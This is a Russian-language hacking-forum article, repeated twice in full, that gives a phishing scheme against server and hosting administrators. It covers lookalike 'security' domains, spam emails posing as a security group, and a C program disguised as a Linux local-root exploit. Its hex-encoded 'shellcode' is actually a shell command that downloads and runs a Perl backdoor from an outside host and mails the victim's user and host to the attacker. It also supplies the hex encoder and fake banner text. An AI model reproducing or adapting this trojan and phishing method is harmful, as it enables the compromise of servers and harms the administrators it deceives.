Такс сейчас я изложу одну достаточно эфективную схему фишинга ....
А улов мы будем на сей раз собирать не с ушастых юзверей а с админов хостингов , мерчант сервисов, ну и прочих интерестных вещей) ......
Начнем с того что запасемся приличным маил листом нащих жертв (имеются ввиду список маилов админов которых будем разводить)
Понятное дело что администратор сервера как правило человек образованный , подозрительный и технически подкованный ... поэтому работать нужно окуратно и чотко.
Для начала регним домен из ряда security-problems.org, security-kernel.us ну и в таком плане а также создадим мыльник на нашем свежеиспечонном домене support@security-problem.org (беру в качестве примера)
а теперь приготовимся готовить ширму для наших ушастых )
Что будем использовать в качестве ширмы? ... а использовать будем "эксплоит для использования локальной уязвимости системы"
Который вместо того чтобы чекнуть систему на наличие бага сделает то что нам нужно (к примеру сольет с хостинга бекдор и запустит его на ремотной машине) Наш сплоит нужно написать так чтобы умный ушастый не сообразил истинность его действий ....
Вот к этому сейчас и приступим .
Для начала определим набор комманд которые должен будет выполнить нас сплоит .....
Code:
`which wget` -P/tmp http://ourhost.com/shell.pl;perl /tmp/shell.pl;
rm /tmp/shell.pl;echo "`whoami`@`hostname -i`"| mail uormail@usa.com
Этот набор комманд сливает скрипт бекдора shell.pl запускает его ..... и шлет на наш почтовый адрес информацию вида <user>@<host> ..... больше сообственно нам ничего и не нужно . Теперь встает вопрос как сделать так чтобы скрыть эти комманды в теле нашего сплоита ? .. отвечаю ..... закодируем их в HEX и подадим в качестве SHELL - кода ... нашего сплоита)
утилу для кодирования набора комманд в HEX напишим сами .... ее код
Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define EOF -1
main()
{
char c;
while ((c = getchar())!= EOF)
printf("\\x%X", c);
}
теперь пусть файл shell.txt содержит наш набор комманд ... кодируем его в HEX
Code:
type shell.txt | HEX.exe > shell_codeготово .... теперь посмотрим как выглядит наш набор комманд после кодирования в HEX
Code:
\x60\x77\x68\x69\x63\x68\x20\x77\x67\x65
\x74\x60\x20\x2D\x50\x2F\x74\x6D\x70\x20
\x68\x74\x74\x70\x3A\x2F\x2F\x6F\x75\x72
\x73\x69\x74\x65\x2E\x63\x6F\x6D\x2F\x73
\x68\x65\x6C\x6C\x2E\x70\x6C\x3B\x70\x65
\x72\x6C\x20\x2F\x74\x6D\x70\x2F\x73\x68
\x65\x6C\x6C\x2E\x70\x6C\x3B\x72\x6D\x20
\x2F\x74\x6D\x70\x2F\x73\x68\x65\x6C\x6C
\x2E\x70\x6C\x3B\x65\x63\x68\x6F\x20\x22
\x60\x77\x68\x6F\x61\x6D\x69\x60\x40\x60
\x68\x6F\x73\x74\x6E\x61\x6D\x65\x20\x2D
\x69\x22\x7C\x20\x6D\x61\x69\x6C\x20\x6F
\x75\x72\x6D\x61\x69\x6C\x40\x75\x73\x61
\x2E\x63\x6F\x6D\xA
ну епт) чем вам не настоящий шел код настоящего сплоита)))комар носа не подточит)) ... декодирование этой штуки произйдет ещо проще)) .... декодирование мы произведем в самом сплоите) .... теперь примимся за кодинг)
Code:
#include <stdio.h>
#include <stdlib.h>
char shellcode[] =
"\x60\x77\x68\x69\x63\x68\x20\x77\x67\x65"
"\x74\x60\x20\x2D\x50\x2F\x74\x6D\x70\x20"
"\x68\x74\x74\x70\x3A\x2F\x2F\x6F\x75\x72"
"\x73\x69\x74\x65\x2E\x63\x6F\x6D\x2F\x73"
"\x68\x65\x6C\x6C\x2E\x70\x6C\x3B\x70\x65"
"\x72\x6C\x20\x2F\x74\x6D\x70\x2F\x73\x68"
"\x65\x6C\x6C\x2E\x70\x6C\x3B\x72\x6D\x20"
"\x2F\x74\x6D\x70\x2F\x73\x68\x65\x6C\x6C"
"\x2E\x70\x6C\x3B\x65\x63\x68\x6F\x20\x22"
"\x60\x77\x68\x6F\x61\x6D\x69\x60\x40\x60"
"\x68\x6F\x73\x74\x6E\x61\x6D\x65\x20\x2D"
"\x69\x22\x7C\x20\x6D\x61\x69\x6C\x20\x6F"
"\x75\x72\x6D\x61\x69\x6C\x40\x75\x73\x61"
"\x2E\x63\x6F\x6D\xA"
//описали масив с шел кодом
#define LSIZE 256
#define BUFSIZE 2000
int main(int argc, char *argv[])
{
char *buf;
if (argc != 2) {
//Это так сказать для пущей уверености что перед ушастым именно сплоит
//при чом сплоит какойто новенький
printf("\nLocal r00t exploit for Linux kernel 2.4.20-2.4.27,2.6.*\n");
printf("Tested on Linux Enterprise 3, Red Hat Linux 9.2, Mandrake Linux 10");
printf("\n - ret addr for Enterprise Linux : 0x1f4c00\n");
printf("\n - ret addr for Red Hat Linux : 0x1d3fa5\n");
printf("\n - ret addr for Mandrake Linux : 0x2f4d56\n");
printf("\n-b : brute mode");
printf("Usage: %s -r [ret addr] [-b]\n\n", argv[0]);
exit(1);
}
//дальше помещаем наш шел-код в память одновременно преобразуя его
//к нормальному виду
buf = (char *) malloc(LSIZE + BUFSIZE + 100);
memcpy(&buf[LSIZE - strlen(shellcode)], shellcode, strlen(shellcode));
//а тут пишем как можно больше логически правильной
//лабуды)) ее я писать не буду) дайте волю фантази
//и наконец выполнение нужных нам действий
if (fork() == 0)
execl("/bin/sh", "sh", "-c", shellcode, 0);while(1);
}
ну что со сплоитом справились ..... теперь приступаем к спаму .....
письмо буим слать вида
"МЫ мол трудолюбивая секьюрити-организация интузиастов кодеров хатим мир во всем мире и искоренить хакеров ..." ну и в подобном ключе)
берем наш маил-лист и спамим -спамим-спамим ..... а потом раскидываемся в кресле открываем бутылочку пива и ждем уведомлений от наших бекдоров))
Удачи)) ...
P.S. Метод на практике показал достаточно высокие результаты и показатели) дерзайте
статья взята с https:\\mazafаka.info
А улов мы будем на сей раз собирать не с ушастых юзверей а с админов хостингов , мерчант сервисов, ну и прочих интерестных вещей) ......
Начнем с того что запасемся приличным маил листом нащих жертв (имеются ввиду список маилов админов которых будем разводить)
Понятное дело что администратор сервера как правило человек образованный , подозрительный и технически подкованный ... поэтому работать нужно окуратно и чотко.
Для начала регним домен из ряда security-problems.org, security-kernel.us ну и в таком плане а также создадим мыльник на нашем свежеиспечонном домене support@security-problem.org (беру в качестве примера)
а теперь приготовимся готовить ширму для наших ушастых )
Что будем использовать в качестве ширмы? ... а использовать будем "эксплоит для использования локальной уязвимости системы"
Который вместо того чтобы чекнуть систему на наличие бага сделает то что нам нужно (к примеру сольет с хостинга бекдор и запустит его на ремотной машине) Наш сплоит нужно написать так чтобы умный ушастый не сообразил истинность его действий ....
Вот к этому сейчас и приступим .
Для начала определим набор комманд которые должен будет выполнить нас сплоит .....
Code:
`which wget` -P/tmp http://ourhost.com/shell.pl;perl /tmp/shell.pl;
rm /tmp/shell.pl;echo "`whoami`@`hostname -i`"| mail uormail@usa.com
Этот набор комманд сливает скрипт бекдора shell.pl запускает его ..... и шлет на наш почтовый адрес информацию вида <user>@<host> ..... больше сообственно нам ничего и не нужно . Теперь встает вопрос как сделать так чтобы скрыть эти комманды в теле нашего сплоита ? .. отвечаю ..... закодируем их в HEX и подадим в качестве SHELL - кода ... нашего сплоита)
утилу для кодирования набора комманд в HEX напишим сами .... ее код
Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define EOF -1
main()
{
char c;
while ((c = getchar())!= EOF)
printf("\\x%X", c);
}
теперь пусть файл shell.txt содержит наш набор комманд ... кодируем его в HEX
Code:
type shell.txt | HEX.exe > shell_codeготово .... теперь посмотрим как выглядит наш набор комманд после кодирования в HEX
Code:
\x60\x77\x68\x69\x63\x68\x20\x77\x67\x65
\x74\x60\x20\x2D\x50\x2F\x74\x6D\x70\x20
\x68\x74\x74\x70\x3A\x2F\x2F\x6F\x75\x72
\x73\x69\x74\x65\x2E\x63\x6F\x6D\x2F\x73
\x68\x65\x6C\x6C\x2E\x70\x6C\x3B\x70\x65
\x72\x6C\x20\x2F\x74\x6D\x70\x2F\x73\x68
\x65\x6C\x6C\x2E\x70\x6C\x3B\x72\x6D\x20
\x2F\x74\x6D\x70\x2F\x73\x68\x65\x6C\x6C
\x2E\x70\x6C\x3B\x65\x63\x68\x6F\x20\x22
\x60\x77\x68\x6F\x61\x6D\x69\x60\x40\x60
\x68\x6F\x73\x74\x6E\x61\x6D\x65\x20\x2D
\x69\x22\x7C\x20\x6D\x61\x69\x6C\x20\x6F
\x75\x72\x6D\x61\x69\x6C\x40\x75\x73\x61
\x2E\x63\x6F\x6D\xA
ну епт) чем вам не настоящий шел код настоящего сплоита)))комар носа не подточит)) ... декодирование этой штуки произйдет ещо проще)) .... декодирование мы произведем в самом сплоите) .... теперь примимся за кодинг)
Code:
#include <stdio.h>
#include <stdlib.h>
char shellcode[] =
"\x60\x77\x68\x69\x63\x68\x20\x77\x67\x65"
"\x74\x60\x20\x2D\x50\x2F\x74\x6D\x70\x20"
"\x68\x74\x74\x70\x3A\x2F\x2F\x6F\x75\x72"
"\x73\x69\x74\x65\x2E\x63\x6F\x6D\x2F\x73"
"\x68\x65\x6C\x6C\x2E\x70\x6C\x3B\x70\x65"
"\x72\x6C\x20\x2F\x74\x6D\x70\x2F\x73\x68"
"\x65\x6C\x6C\x2E\x70\x6C\x3B\x72\x6D\x20"
"\x2F\x74\x6D\x70\x2F\x73\x68\x65\x6C\x6C"
"\x2E\x70\x6C\x3B\x65\x63\x68\x6F\x20\x22"
"\x60\x77\x68\x6F\x61\x6D\x69\x60\x40\x60"
"\x68\x6F\x73\x74\x6E\x61\x6D\x65\x20\x2D"
"\x69\x22\x7C\x20\x6D\x61\x69\x6C\x20\x6F"
"\x75\x72\x6D\x61\x69\x6C\x40\x75\x73\x61"
"\x2E\x63\x6F\x6D\xA"
//описали масив с шел кодом
#define LSIZE 256
#define BUFSIZE 2000
int main(int argc, char *argv[])
{
char *buf;
if (argc != 2) {
//Это так сказать для пущей уверености что перед ушастым именно сплоит
//при чом сплоит какойто новенький
printf("\nLocal r00t exploit for Linux kernel 2.4.20-2.4.27,2.6.*\n");
printf("Tested on Linux Enterprise 3, Red Hat Linux 9.2, Mandrake Linux 10");
printf("\n - ret addr for Enterprise Linux : 0x1f4c00\n");
printf("\n - ret addr for Red Hat Linux : 0x1d3fa5\n");
printf("\n - ret addr for Mandrake Linux : 0x2f4d56\n");
printf("\n-b : brute mode");
printf("Usage: %s -r [ret addr] [-b]\n\n", argv[0]);
exit(1);
}
//дальше помещаем наш шел-код в память одновременно преобразуя его
//к нормальному виду
buf = (char *) malloc(LSIZE + BUFSIZE + 100);
memcpy(&buf[LSIZE - strlen(shellcode)], shellcode, strlen(shellcode));
//а тут пишем как можно больше логически правильной
//лабуды)) ее я писать не буду) дайте волю фантази
//и наконец выполнение нужных нам действий
if (fork() == 0)
execl("/bin/sh", "sh", "-c", shellcode, 0);while(1);
}
ну что со сплоитом справились ..... теперь приступаем к спаму .....
письмо буим слать вида
"МЫ мол трудолюбивая секьюрити-организация интузиастов кодеров хатим мир во всем мире и искоренить хакеров ..." ну и в подобном ключе)
берем наш маил-лист и спамим -спамим-спамим ..... а потом раскидываемся в кресле открываем бутылочку пива и ждем уведомлений от наших бекдоров))
Удачи)) ...
P.S. Метод на практике показал достаточно высокие результаты и показатели) дерзайте
статья взята с https:\\mazafаka.info